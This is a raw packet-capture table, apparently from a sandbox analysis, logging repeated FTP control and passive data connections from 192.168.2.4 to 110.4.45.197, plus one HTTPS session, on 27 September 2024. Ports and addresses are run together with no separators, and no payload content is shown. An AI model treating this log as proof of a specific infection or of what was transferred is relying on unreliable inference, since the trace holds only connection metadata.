                                      Sep 27, 2024 13:10:23.740365028 CEST4974121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:24.018543005 CEST2149741110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:24.044948101 CEST2149751110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:24.045090914 CEST4975121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:24.049859047 CEST2149751110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:24.068455935 CEST4974121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:24.374522924 CEST2149751110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:24.374686003 CEST4975121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:24.379771948 CEST2149751110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:24.704941034 CEST2149751110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:24.705620050 CEST4975351497192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:24.710485935 CEST5149749753110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:24.710586071 CEST4975351497192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:24.710805893 CEST4975121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:24.715643883 CEST2149751110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:25.537411928 CEST2149751110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:25.537920952 CEST4975351497192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:25.537965059 CEST4975351497192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:25.542953014 CEST5149749753110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:25.543416023 CEST5149749753110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:25.543689013 CEST4975351497192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:25.584090948 CEST4975121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:25.868066072 CEST2149751110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:25.892936945 CEST4975121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:25.897993088 CEST2149751110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:26.223146915 CEST2149751110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:26.223920107 CEST4975465361192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:26.228841066 CEST6536149754110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:26.228899002 CEST4975465361192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:26.228996992 CEST4975121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:26.233768940 CEST2149751110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:26.766532898 CEST49755443192.168.2.4104.26.12.205
                                      Sep 27, 2024 13:10:26.766634941 CEST44349755104.26.12.205192.168.2.4
                                      Sep 27, 2024 13:10:26.766735077 CEST49755443192.168.2.4104.26.12.205
                                      Sep 27, 2024 13:10:26.770224094 CEST49755443192.168.2.4104.26.12.205
                                      Sep 27, 2024 13:10:26.770261049 CEST44349755104.26.12.205192.168.2.4
                                      Sep 27, 2024 13:10:27.066812992 CEST2149751110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:27.115348101 CEST4975121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:27.242949963 CEST44349755104.26.12.205192.168.2.4
                                      Sep 27, 2024 13:10:27.243043900 CEST49755443192.168.2.4104.26.12.205
                                      Sep 27, 2024 13:10:27.276046038 CEST49755443192.168.2.4104.26.12.205
                                      Sep 27, 2024 13:10:27.276139975 CEST44349755104.26.12.205192.168.2.4
                                      Sep 27, 2024 13:10:27.276385069 CEST44349755104.26.12.205192.168.2.4
                                      Sep 27, 2024 13:10:27.318695068 CEST49755443192.168.2.4104.26.12.205
                                      Sep 27, 2024 13:10:27.347425938 CEST49755443192.168.2.4104.26.12.205
                                      Sep 27, 2024 13:10:27.395406961 CEST44349755104.26.12.205192.168.2.4
                                      Sep 27, 2024 13:10:27.457593918 CEST44349755104.26.12.205192.168.2.4
                                      Sep 27, 2024 13:10:27.457649946 CEST44349755104.26.12.205192.168.2.4
                                      Sep 27, 2024 13:10:27.457695961 CEST49755443192.168.2.4104.26.12.205
                                      Sep 27, 2024 13:10:27.462587118 CEST49755443192.168.2.4104.26.12.205
                                      Sep 27, 2024 13:10:28.301472902 CEST4975621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:28.306507111 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:28.306807041 CEST4975621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:28.350281000 CEST4975121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:28.351356030 CEST4975465361192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:29.133990049 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:29.134206057 CEST4975621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:29.139206886 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:29.461889982 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:29.462064028 CEST4975621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:29.467634916 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:29.822135925 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:29.826246977 CEST4975621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:29.831170082 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:30.154460907 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:30.154666901 CEST4975621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:30.159470081 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:30.482898951 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:30.483570099 CEST4975621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:30.489854097 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:30.811661959 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:30.812300920 CEST4975621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:30.817274094 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:31.140465021 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:31.141289949 CEST4975755730192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:31.146450043 CEST5573049757110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:31.146544933 CEST4975755730192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:31.146662951 CEST4975621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:31.152157068 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:31.976399899 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:31.976691008 CEST4975755730192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:31.976773024 CEST4975755730192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:31.981568098 CEST5573049757110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:31.982063055 CEST5573049757110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:31.982120991 CEST4975755730192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:32.021596909 CEST4975621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:32.303776026 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:32.323329926 CEST4975621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:32.328181982 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:32.656864882 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:32.657329082 CEST4975860182192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:32.663191080 CEST6018249758110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:32.663345098 CEST4975860182192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:32.663347960 CEST4975621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:32.668981075 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:33.498569965 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:33.499006033 CEST4975860182192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:33.499133110 CEST4975860182192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:33.503952026 CEST6018249758110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:33.503974915 CEST6018249758110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:33.503985882 CEST6018249758110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:33.504762888 CEST6018249758110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:33.504839897 CEST4975860182192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:33.552867889 CEST4975621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:33.828073978 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:33.828564882 CEST4975621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:33.834392071 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:34.156984091 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:34.157469034 CEST4975961163192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:34.162374020 CEST6116349759110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:34.162461996 CEST4975961163192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:34.162580967 CEST4975621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:34.167361975 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:34.992522955 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:34.992733955 CEST4975961163192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:34.999034882 CEST6116349759110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:34.999120951 CEST4975961163192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:35.037350893 CEST4975621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:35.323205948 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:35.365360022 CEST4975621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:11:39.040805101 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:11:39.055085897 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:39.110284090 CEST4976121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:11:39.116904974 CEST2149761110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:39.117002010 CEST4976121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:11:39.117321968 CEST4976121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:11:39.127830029 CEST2149761110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:39.129703045 CEST2149761110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:39.129842997 CEST4976121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:11:39.378043890 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:39.379965067 CEST4976252440192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:11:39.386188030 CEST5244049762110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:39.386261940 CEST4976252440192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:11:39.386344910 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:11:39.397891045 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:40.304414988 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:40.304596901 CEST4976252440192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:11:40.304620028 CEST4976252440192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:11:40.314883947 CEST5244049762110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:40.317925930 CEST5244049762110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:40.317984104 CEST4976252440192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:11:40.349874973 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:11:40.667108059 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:40.709254980 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:11:57.040282011 CEST4976321192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:11:57.045429945 CEST2149763110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:57.052282095 CEST4976321192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:11:57.052282095 CEST4976321192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:11:57.057550907 CEST2149763110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:57.064270973 CEST4976321192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:11:58.709117889 CEST4975621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:11:58.714050055 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:59.099595070 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:59.104652882 CEST4976452328192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:11:59.109605074 CEST5232849764110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:59.110402107 CEST4976452328192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:11:59.110579967 CEST4975621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:11:59.115483046 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:59.945193052 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:59.947577953 CEST4976452328192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:11:59.952594995 CEST5232849764110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:59.952625036 CEST5232849764110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:59.952675104 CEST5232849764110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:59.952702999 CEST5232849764110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:59.952728987 CEST5232849764110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:59.952766895 CEST4976452328192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:11:59.952825069 CEST4976452328192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:11:59.952883005 CEST5232849764110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:59.952930927 CEST5232849764110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:59.952958107 CEST5232849764110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:59.952984095 CEST5232849764110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:59.953015089 CEST5232849764110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:59.953047037 CEST4976452328192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:11:59.953116894 CEST4976452328192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:11:59.957741976 CEST5232849764110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:59.957859993 CEST5232849764110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:59.958029032 CEST5232849764110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:59.958055019 CEST5232849764110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:59.958082914 CEST5232849764110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:59.958112955 CEST5232849764110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:59.958142996 CEST4976452328192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:11:59.958189011 CEST4976452328192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:11:59.958275080 CEST5232849764110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:59.958328009 CEST5232849764110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:59.958369970 CEST5232849764110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:59.958415985 CEST5232849764110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:59.958431959 CEST4976452328192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:11:59.958444118 CEST5232849764110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:59.958472013 CEST5232849764110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:59.958534956 CEST5232849764110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:59.963048935 CEST5232849764110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:59.963098049 CEST5232849764110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:59.963289022 CEST5232849764110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:59.963433027 CEST5232849764110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:59.963459969 CEST5232849764110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:59.963534117 CEST5232849764110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:59.963715076 CEST5232849764110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:59.964019060 CEST5232849764110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:11:59.968400002 CEST4976452328192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:00.021800995 CEST4975621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:00.185642958 CEST4976521192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:00.190757990 CEST2149765110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:00.190838099 CEST4976521192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:00.191011906 CEST4976521192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:00.196269989 CEST2149765110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:00.196331978 CEST4976521192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:00.780853033 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:01.021878958 CEST4975621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:01.023907900 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:01.023972988 CEST4975621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:02.980319977 CEST4976621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:03.038110018 CEST2149766110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:03.038214922 CEST4976621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:39.536515951 CEST5543849774110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:39.536561966 CEST5543849774110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:39.536565065 CEST4977455438192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:39.536590099 CEST5543849774110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:39.536636114 CEST4977455438192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:39.536645889 CEST5543849774110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:39.536673069 CEST5543849774110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:39.536689043 CEST4977455438192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:39.536720037 CEST5543849774110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:39.536746025 CEST5543849774110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:39.536776066 CEST5543849774110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:39.536814928 CEST4977455438192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:39.536839962 CEST4977455438192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:39.536842108 CEST5543849774110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:39.536874056 CEST5543849774110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:39.536942959 CEST5543849774110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:39.536989927 CEST5543849774110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:39.542032003 CEST5543849774110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:39.542125940 CEST5543849774110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:39.542567015 CEST5543849774110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:39.544456959 CEST4977455438192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:39.712356091 CEST4975621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:39.848197937 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:40.032361984 CEST4977521192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:40.037781954 CEST2149775110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:40.040584087 CEST4977521192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:40.040584087 CEST4977521192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:40.046258926 CEST2149775110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:40.052349091 CEST4977521192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:40.056344032 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:40.469153881 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:40.579972029 CEST4975621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:45.103346109 CEST4975621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:45.108381987 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:45.459942102 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:45.461419106 CEST4977655768192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:45.466389894 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:45.467087030 CEST4977655768192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:45.467314959 CEST4975621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:45.472197056 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.360636950 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.360892057 CEST4977655768192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:46.365973949 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.366004944 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.366036892 CEST4977655768192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:46.366038084 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.366053104 CEST4977655768192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:46.366066933 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.366089106 CEST4977655768192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:46.366113901 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.366158962 CEST4977655768192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:46.366175890 CEST4977655768192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:46.366329908 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.366380930 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.366386890 CEST4977655768192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:46.366406918 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.366429090 CEST4977655768192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:46.366437912 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.366455078 CEST4977655768192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:46.366487026 CEST4977655768192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:46.366503000 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.366556883 CEST4977655768192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:46.371115923 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.371144056 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.371170044 CEST4977655768192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:46.371170044 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.371186972 CEST4977655768192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:46.371220112 CEST4977655768192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:46.371220112 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.371248007 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.371274948 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.371280909 CEST4977655768192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:46.371303082 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.371309996 CEST4977655768192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:46.371330976 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.371341944 CEST4977655768192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:46.371367931 CEST4977655768192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:46.371390104 CEST4977655768192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:46.371445894 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.371478081 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.371494055 CEST4977655768192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:46.371504068 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.371531010 CEST4977655768192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:46.371575117 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.376236916 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.376451015 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.376498938 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.376528025 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.376559019 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.376605034 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.376635075 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.376678944 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.376708031 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.377135038 CEST5576849776110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:46.377182961 CEST4977655768192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:46.467490911 CEST4975621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:47.265567064 CEST2149756110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:47.318897963 CEST4975621192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:52.298134089 CEST4977721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:52.303175926 CEST2149777110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:52.303256989 CEST4977721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:53.126218081 CEST2149777110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:53.126368999 CEST4977721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:53.132963896 CEST2149777110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:53.454895973 CEST2149777110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:53.456473112 CEST4977721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:53.462038994 CEST2149777110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:53.820796013 CEST2149777110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:53.824496984 CEST4977721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:53.829380035 CEST2149777110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:54.150491953 CEST2149777110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:54.152523041 CEST4977721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:54.157500029 CEST2149777110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:54.480330944 CEST2149777110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:54.480482101 CEST4977721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:54.486978054 CEST2149777110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:54.806366920 CEST2149777110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:54.806555033 CEST4977721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:54.811742067 CEST2149777110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:55.133074045 CEST2149777110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:55.133421898 CEST4977858620192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:55.138619900 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:55.138688087 CEST4977858620192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:55.138752937 CEST4977721192.168.2.4110.4.45.197
